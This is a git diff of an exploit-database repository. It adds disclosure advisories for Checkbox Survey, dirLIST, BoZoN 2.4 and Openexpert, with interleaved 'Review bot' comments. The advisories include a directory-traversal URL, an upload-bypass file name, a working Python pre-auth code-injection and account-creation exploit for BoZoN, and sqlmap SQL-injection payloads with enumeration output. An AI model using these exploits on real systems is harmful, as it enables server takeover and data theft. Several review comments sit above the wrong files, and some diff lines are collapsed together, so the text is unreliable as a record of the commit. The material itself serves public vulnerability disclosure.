diff --git a/files.csv b/files.csv
index c66a3ed06..cc6598e1d 100644
--- a/files.csv
+++ b/files.csv
@@ -17831,7 +17831,7 @@ id,file,description,date,author,platform,type,port
 4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0
 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0
 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0
-4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0
+4179,platforms/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0
 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0
 4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0
 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps,0
@@ -20480,7 +20480,7 @@ id,file,description,date,author,platform,type,port
 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
 7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0
 7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0
-7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
+7746,platforms/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
@@ -20511,10 +20511,10 @@ id,file,description,date,author,platform,type,port
 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0
 7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0
 7793,platforms/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps,0
-7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection",2009-01-15,H!tm@N,php,webapps,0
-7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
-7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
-7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0
+7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,php,webapps,0
+7796,platforms/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
+7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
+7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - SQL Injection",2009-01-15,nuclear,php,webapps,0
 7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
 7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
 7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
@@ -20525,12 +20525,12 @@ id,file,description,date,author,platform,type,port
 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
-7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0
+7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0
 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0
-7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
+7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0
 7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0
-7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
+7818,platforms/php/webapps/7818.txt,"SCMS 1 - Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0
@@ -20573,7 +20573,7 @@ id,file,description,date,author,platform,type,port
 7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
-7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0
+7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0
 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0
 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0
 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0
@@ -20581,8 +20581,8 @@ id,file,description,date,author,platform,type,port
 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0
 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0
 7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion",2009-01-28,mozi,php,webapps,0
-7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0
-7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0
+7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0
+7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0
 7900,platforms/php/webapps/7900.txt,"Social Engine - (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0
 7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0
 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0
@@ -22361,7 +22361,7 @@ id,file,description,date,author,platform,type,port
 11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0
 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0
 11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0
-11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0
+11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0
 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps,0
 11296,platforms/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0
 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,php,webapps,0
@@ -35544,7 +35544,7 @@ id,file,description,date,author,platform,type,port
 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0
 37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0
 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
-37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
+37617,platforms/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,php,webapps,0
 37620,platforms/php/webapps/37620.txt,"Joomla! Component 'com_docman' - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0
@@ -37019,3 +37019,7 @@ id,file,description,date,author,platform,type,port
 41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0
 41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0
 41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0
+41083,platforms/php/webapps/41083.txt,"dirLIST 0.3.0 - Arbitrary File Upload",2017-01-17,hyp3rlinx,php,webapps,0
+41084,platforms/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,php,webapps,0
+41086,platforms/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",aspx,webapps,0
+41087,platforms/php/webapps/41087.txt,"Openexpert 0.5.17 - SQL Injection",2017-01-17,"Nassim Asrir",php,webapps,0
diff --git a/platforms/aspx/webapps/41086.txt b/platforms/aspx/webapps/41086.txt
new file mode 100755
index 000000000..f603fb96d
--- /dev/null
+++ b/platforms/aspx/webapps/41086.txt
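Review bot: The author field of the new 41086 row, `"Fady Mohammed Osman"`, does not match the header of the advisory this commit adds, `# Exploit Author: Fady Mohamed Osman (@fady_osman)`, so one spelling is wrong and author searches will miss the entry in one of the two places. The row should take the spelling from the advisory unless the index is the canonical source, in which case the advisory header in 41086.txt needs the fix instead. The same row names only `2016 Q2` while the advisory's Version line lists both 2016 Q2 and 2016 Q4 as affected; `"Check Box 2016 Q2 / Q4 Survey - Multiple Vulnerabilities"` would reflect what the advisory actually reports.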
@@ -0,0 +1,55 @@ +# Exploit Title: Check Box 2016 Q2 Survey Multiple Vulnerabilities +# Exploit Author: Fady Mohamed Osman (@fady_osman) +# Exploit-db : http://www.exploit-db.com/author/?a=2986 +# Youtube : https://www.youtube.com/user/cutehack3r +# Date: Jan 17, 2017 +# Vendor Homepage: https://www.checkbox.com/ +# Software Link: https://www.checkbox.com/free-checkbox-trial/ +# Version: Check Box 2016 Q2,Check Box 2016 Q4 - Fixed in Checkbox Survey, +Inc. v6.7 +# Tested on: Check Box 2016 Q2 Trial on windows Server 2012. +# Description : Checkbox is a survey application deployed by a number of +highly profiled companies and government entities like Microsoft, AT&T, +Vodafone, Deloitte, MTV, Virgin, U.S. State Department, U.S. Secret +Service, U.S. Necular Regulatory Comission, UNAIDS, State Of California +and more!! + +For a full list of their clients please visit: +https://www.checkbox.com/clients/ + +1- Directory traversal vulnerability : For example to download the +web.config file we can send a request as the following: +http://www.example.com/Checkbox/Upload.ashx?f=..\..\web.config&n=web.config + +2- Direct Object Reference : +attachments to surveys can be accessed directly without login as the +following: +https://www.victim.com/Checkbox/ViewContent.aspx?contentId=5001 +I created a script that can bruteforce the numbers to find ID's that will +download the attachment and you can easily write one on your own ;). + +3- Open redirection in login page for example: +https://www.victim.com/Checkbox/Login.aspx?ReturnUrl=http://www.google.com + +If you can't see why an open redirection is a problem in login page please +visit the following page: +https://www.asp.net/mvc/overview/security/preventing- +open-redirection-attacks + + +Timeline: +December 2016 - Discovered the vulnerability during Pen. Test conducted by +ZINAD IT for one of our clients. +Jan 12,2017 - Reported to vendor. +Jan 15,2017 - Sent a kind reminder to the vendor. 
+Jan 16,2017 - First Vendor Response said they will only consider directory
+traversal as a vulnerability and that a fix will be sent in the next day.
+Jan 16,2017 - Replied to explain why DOR and Open Redirect is a problem.
+Jan 17,2017 - Patch Release Fixed the Directory Traversal.
+Jan 17,2017 - Sent another email to confirm if DOR and open redirect wont
+be fixed.
+Jan 17,2017 - Open redirection confirmed to be fixed in the same patch
+released before for DOR the vendor said they didn't believe that's a
+security concern and that they have added a warning to let users know that
+their attachments will be available to anyone with access to that survey page !!
+
diff --git a/platforms/php/webapps/41083.txt b/platforms/php/webapps/41083.txt
new file mode 100755
index 000000000..2db988b00
--- /dev/null
+++ b/platforms/php/webapps/41083.txt
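Review bot: The `# Version:` header line mixes affected and fixed versions and is wrapped mid-sentence (`# Version: Check Box 2016 Q2,Check Box 2016 Q4 - Fixed in Checkbox Survey,` followed by a bare `Inc. v6.7` line), so anyone reading or parsing the header gets a truncated fixed-version value. Splitting it into `# Version: Check Box 2016 Q2, Check Box 2016 Q4` and `# Fixed in: Checkbox Survey v6.7` keeps each fact on its own line. The last timeline entry likewise folds two different outcomes into one sentence — open redirection fixed by the patch, direct object reference left unfixed with only a UI warning added — and two separate `Jan 17,2017` entries would make it plain to defenders that the attachment-exposure issue remains open in v6.7. Minor: `Necular Regulatory Comission` should read `Nuclear Regulatory Commission`.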
@@ -0,0 +1,165 @@ ++]################################################################################################### +[+] Credits / Discovery: John Page +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt +[+] ISR: Apparition +[+]################################################################################################## + + + +Vendor: +=============== +sourceforge.net + + +Product: +=============== +dirList v0.3.0 + + +Download: +=========== +sourceforge.net/projects/dir-list/ + + +dirLIST displays files and folders in a given HTTP/FTP directory. It has a wonderful interface with choice of Thumbnail or List +view along with gorgeous icons for different file types. Includes a sleek gallery, web based mp3 player, file admin + more. + + + +Vulnerability Type: +====================================== +Bypass File Upload / CMD Execution + + + +CVE Reference: +=============== +N/A + + +Security Issue: +=============== + +When uploading "Banned" file types dirLIST replies with a base64 encoded error message. + +e.g. +dXBsb2FkX2Jhbm5lZA== + +Decoded it reads, "upload_banned". + + +Banned files are setup in the "config.php" file. + +$banned_file_types = array('.php', '.php3', '.php4', '.php5', '.htaccess', '.htpasswd', '.asp', '.aspx'); + +When upload a file, the check is made for banned file types. + +In "process_upload.php" on Line: 47 + +if(in_array(strtolower(strrchr($file_name, ".")), $banned_file_types)) + { + header("Location: ../index.php?folder=".$_POST['folder']."&err=".base64_encode("upload_banned")); + exit; + } + + +However, appending a semicolon ";" to end of our PHP file will skirt the security check allowing +us to upload a banned PHP file type, and our PHP file will be executed by server when accessed later. + +Apache manual: +“Files can have more than one extension, and the order of the extensions is normally irrelevant. 
For example, if the file welcome.html.fr +maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. etc.. + +Therefore, a file named ‘file.php.1’, can be interpreted as a PHP file and be executed on server. +This usually works if the last extension is not specified in the list of mime-types known to the web server. + +Developers are usually unaware of the "Apache" feature to process files with some odd unexpected extension like PHP.1, PHP.; and such. + + +Tested on: + +Windows 7 +Bitnami wampstack-5.6.29-0. +Apache/2.4.23 (Win64) + +Linux +XAMPP 5.6.8-0 +Apache/2.4.12 (Unix) + + + +Exploit/POC: +============ + +1) Create a banned PHP file to upload named. + +"TEST.php.;" + +2) Upload to server using dirLIST. + + +3) Done! + + + + +Result: + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message +bus:/:/sbin/nologin avahi:x:70:70:Avahi +daemon:/:/sbin/nologin + +etc... + + + +Network Access: +=============== +Remote + + + +Impact: +================= +System Takeover + + + +Severity: +=========== +High + + +Disclosure Timeline: +===================== +Vendor Notification: No Replies +January 17, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. 
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c) HYP3RLINX
\ No newline at end of file
diff --git a/platforms/php/webapps/41084.txt b/platforms/php/webapps/41084.txt
new file mode 100755
index 000000000..ad5c73e4c
--- /dev/null
+++ b/platforms/php/webapps/41084.txt
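Review bot: The first line of the new file reads `+]####…` while every other banner line in this advisory and in 41084.txt reads `[+]####…`, so the opening `[` was dropped; restoring `[+]###…` keeps the header consistent with the rest of the file. The Security Issue section quotes the vulnerable check (`strtolower(strrchr($file_name, "."))` against `$banned_file_types`) but offers no remediation, which is what most readers of a public advisory need; a line such as `Fix: validate every extension component against an allowlist instead of checking only the last one against a denylist, and serve uploads from a directory where script execution is disabled` would close that gap. The `Vendor:` field gives only `sourceforge.net`, the hosting site, rather than the project or maintainer, which leaves the `Vendor Notification: No Replies` timeline entry with no one identifiable it was sent to.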
@@ -0,0 +1,111 @@ +[+]################################################################################################## +[+] Credits / Discovery: John Page +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/BOZON-PRE-AUTH-COMMAND-EXECUTION.txt +[+] ISR: ApparitionSec +[+]################################################################################################## + + + +Vendor: +============ +bozon.pw/en/ + + + +Product: +=========== +BoZoN 2.4 + +Bozon is a simple file-sharing app. Easy to install, free and open source Just copy BoZoN's files onto your server. + + +Vulnerability Type: +========================== +Pre-Auth Command Execution + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ + +A Bozon vulnerability allows unauthenticated attackers to add arbitrary users and inject system commands to the "auto_restrict_users.php" +file of the Bozon web interface. + +This issue results in arbitrary code execution on the affected host, attackers system commands will get written and stored to the PHP file +"auto_restrict_users.php" under the private/ directory of the Bozon application, making them persist. Remote attackers will get the command +responses from functions like phpinfo() as soon as the HTTP request has completed. + +In addition when an admin or user logs in or the webpage gets reloaded the attackers commands are then executed as they are stored. +If a Command is not injected to the "auto_restrict_users.php" file, unauthenticated attackers can opt to add user accounts at will. 
+ + + +Exploit/POC: +============= + +import urllib,urllib2,time + +#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit +#Discovery / credits: John Page - Hyp3rlinx/Apparition +#hyp3rlinx.altervista.org +#Exploit: add user account | run phpinfo() command +#========================================================= + +EXPLOIT=0 +IP=raw_input("[Bozon IP]>") +EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()")) + +if EXPLOIT==1: + CMD="Apparition" +else: + CMD='"];$PWN=''phpinfo();//''//"' + +if EXPLOIT != 0: + url = 'http://'+IP+'/BoZoN-master/index.php' + data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''}) + req = urllib2.Request(url, data) + +response = urllib2.urlopen(req) +if EXPLOIT==1: + print 'Apparition user account created! password: abc123' +else: + print "Done!... waiting for phpinfo" + time.sleep(0.5) + print response.read() + + + + +Impact: +=============== +System Takeover + + + +Severity: +========= +High + + + +Disclosure Timeline: +==================================== +Vendor Notification: No Replies +January 17, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) HYP3RLINX \ No newline at end of file 
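Review bot: The Security Issue section names the sink (`auto_restrict_users.php` under `private/`) but never states where the untrusted value enters, which a reader has to reconstruct from the PoC: the `login` field of the `creation=1` POST to `index.php`. Saying that in prose — which request, which field, and that the value is written into a PHP file without validation — gives a defender the location to fix and a way to confirm a fix; the PoC also sends `'token' : ''`, which suggests (the advisory does not say so, so this is inferred) that the creation form's token is not enforced and is worth confirming as a separate finding. A remediation line is missing too, e.g. `Fix: restrict login names to a strict character set and keep the user list as data (JSON/serialized) rather than generated PHP`. Minor: `free and open source Just copy` needs a full stop after `source`.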
diff --git a/platforms/php/webapps/41087.txt b/platforms/php/webapps/41087.txt new file mode 100755 index 000000000..db86e7ced --- /dev/null +++ b/platforms/php/webapps/41087.txt @@ -0,0 +1,48 @@ +# Title : Openexpert 0.5.17 - Sql Injection +# Author: Nassim Asrir +# Author Company: Henceforth +# Tested on: Winxp sp3 - win7 +# Vendor: https://sourceforge.net/projects/law-expert/ +# Download Software: https://sourceforge.net/projects/law-expert/files/ + +################################################# + +## About The Product : ## + +OpenExpert. Dual use Web based and Easy to Use Expert System or Education System. + +## Vulnerability : ## + +- Vulnerable Parametre : area_id + +- HTTP Method : GET + +- To exploit it : http://HOST/expert_wizard.php?area_id=1' + +- Sqlmap Output : + +Parameter: area_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: area_id=1 AND 4961=4961 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: area_id=1 AND SLEEP(5) +--- +[15:35:38] [INFO] the back-end DBMS is MySQL +web server operating system: Windows +web application technology: Apache 2.4.23, PHP 5.6.26 +back-end DBMS: MySQL >= 5.0 +[15:35:38] [INFO] fetching database names +[15:35:39] [INFO] the SQL query used returns 5 entries +[15:35:39] [INFO] retrieved: information_schema +[15:35:39] [INFO] retrieved: mysql +[15:35:39] [INFO] retrieved: performance_schema +[15:35:39] [INFO] retrieved: sys +[15:35:39] [INFO] retrieved: test + diff --git a/platforms/windows/local/19143.c b/platforms/windows/local/19143.c index 2c63b3eb1..bf492adad 100755 --- a/platforms/windows/local/19143.c 
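Review bot: The advisory names the parameter (`area_id`, GET, via `expert_wizard.php`) and pastes a sqlmap transcript, but never identifies the vulnerable statement or a remediation, so a defender cannot verify a fix from it; a line such as `Fix: cast area_id to an integer or bind it as a prepared-statement parameter before it reaches the query` (presumably where expert_wizard.php reads the parameter — not shown here) would make the report actionable. `Tested on: Winxp sp3 - win7` describes a client OS, whereas the transcript's `web server operating system: Windows`, `Apache 2.4.23, PHP 5.6.26` is the server stack that matters for triage and belongs in the header. Minor: `Vulnerable Parametre` should read `Vulnerable Parameter`, and the title's `Sql Injection` differs from the index entry's `SQL Injection`.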
+++ b/platforms/windows/local/19143.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/180/info Beginning April 1, 2001 and continuing through April 8, 2001, Windows applications will be offset by one hour - even though the system clock will show the proper time. This is due to the MSVCRT.DLL not correctly interpreting Daylight Savings time during any year in which April 1st falls on a Sunday. In these instances, the DLL is fooled into thinking that DST begins one week later on April 8th. MSVCRT.DLL shipping with MS VC++ versions 4.1, 4.2, 5.0 and 6.0 are thought to be vulnerable. +*/ // // APRIL1.C -- Simple test program for the "April's Fools 2001" bug